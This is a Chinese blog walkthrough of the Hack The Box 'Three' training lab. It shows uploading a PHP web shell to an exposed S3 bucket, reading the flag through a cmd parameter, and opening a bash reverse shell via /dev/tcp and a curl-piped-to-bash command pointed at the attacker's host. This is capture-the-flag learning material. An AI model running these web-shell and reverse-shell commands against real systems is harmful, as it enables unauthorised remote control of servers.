1. Toy模板网首页
  2. > Toy博客

Hackthebox Three 靶机(starting point)

7月前 作者:wazjr 分类:Toy博客 阅读(22) 违法举报

这篇具有很好参考价值的文章主要介绍了Hackthebox Three 靶机(starting point)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

题目显示的难度是very easy,但对我来说是difficult,废话少数,来看一下怎么做吧。

先完成引导的题目,除了flag,其他题目难度都不大,只是在使用aws s3工具时比较迷茫,例如不知道需要加--endpoint=http://s3.thetoppers.htb 参数。

有了工具并能连接上aws之后,我们需要做什么呢?

我们需要找到这个工具是否存在漏洞,或者能否利用这个工具上传木马文件,进而获取目标服务器的控制权限,因为我们的目的是获取flag,只有能随意读取目标服务器的文件,我们才能找到flag

aws工具可以列出所有bucket对象

aws --endpoint=http://s3.thetoppers.htb s3 ls

进一步列出bucket的内容

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

在浏览器访问找到的index.php和.htaccess文件

Hackthebox Three 靶机(starting point)

 文章来源地址https://www.toymoban.com/news/detail-602436.html

Hackthebox Three 靶机(starting point)

既然可以访问到对应的文件,我们下一步看看能不能上传shell到服务器 

看到aws的命令可以上传文件到网站

// 将当前目录里的 MyFile.txt文件拷贝到 s3://my-bucket/MyFolder
$ aws s3 cp MyFile.txt s3://my-bucket/MyFolder/


// 将s3://my-bucket/MyFolder所有 .jpg 的文件移到 ./MyDirectory
$ aws s3 mv s3://my-bucket/MyFolder ./MyDirectory --exclude '*' --include '*.jpg' --recursive

// 列出  my-bucket的所有内容
$ aws s3 ls s3://my-bucket

// 列出my-bucket中MyFolder的所有内容
$ aws s3 ls s3://my-bucket/MyFolder

// 删除 s3://my-bucket/MyFolder/MyFile.txt
$ aws s3 rm s3://my-bucket/MyFolder/MyFile.txt

// 删除 s3://my-bucket/MyFolder 和它的所有内容
$ aws s3 rm s3://my-bucket/MyFolder --recursive

参考如上代码,我们可以构造下一步的payload,上传shell.php到服务器

Hackthebox Three 靶机(starting point)

Hackthebox Three 靶机(starting point)

 浏览器访问shell.php,可以执行!!!

Hackthebox Three 靶机(starting point)

 浏览器输入以下命令获取flag

http://thetoppers.htb/shell.php?cmd=cat%20../flag.txt

Hackthebox Three 靶机(starting point)

 

 

其实以上就足够了,但是看了一下Walkthrough,发现一个比在浏览器运行命令更酷的方式,就是反弹shell

可以参考以下两位大佬:

https://www.zhihu.com/tardis/zm/art/166165803?source_id=1005

https://becivells.github.io/2019/01/bash_i_dev_tcp/

想要获得反弹shell,需要几样东西,nc监听端口,python打开服务监听,客户端发起请求

在kali上创建如下shell.sh文件,注意这个文件存放的位置要和下面python服务运行时的位置一样

#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1

监听1337端口

nc -nvlp 1337

python在8000端口上启动一个web服务器,并托管我们写的bash文件

python3 -m http.server 8000

Hackthebox Three 靶机(starting point)

在浏览器访问刚刚创建的shell.sh文件

http://thetoppers.htb/shell.php?cmd=curl%20<YOUR_IP_ADDRESS>:8000/shell.sh|bash

Hackthebox Three 靶机(starting point)

在kalli的nc窗口可以接受到反弹shell

Hackthebox Three 靶机(starting point)

 

 

然后奇怪的地方在于我想在浏览器上直接通过cmd参数连接到kali的nc端口,但是nc始终连接不了,望路过的大佬指点

10.10.14.162是kali的openvpn的ip

如下

http://thetoppers.htb/shell.php?cmd=bash -i >& /dev/tcp/10.10.14.162/1337 0>&1

Hackthebox Three 靶机(starting point)

 

Hackthebox Three 靶机(starting point)

 

到了这里,关于Hackthebox Three 靶机(starting point)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包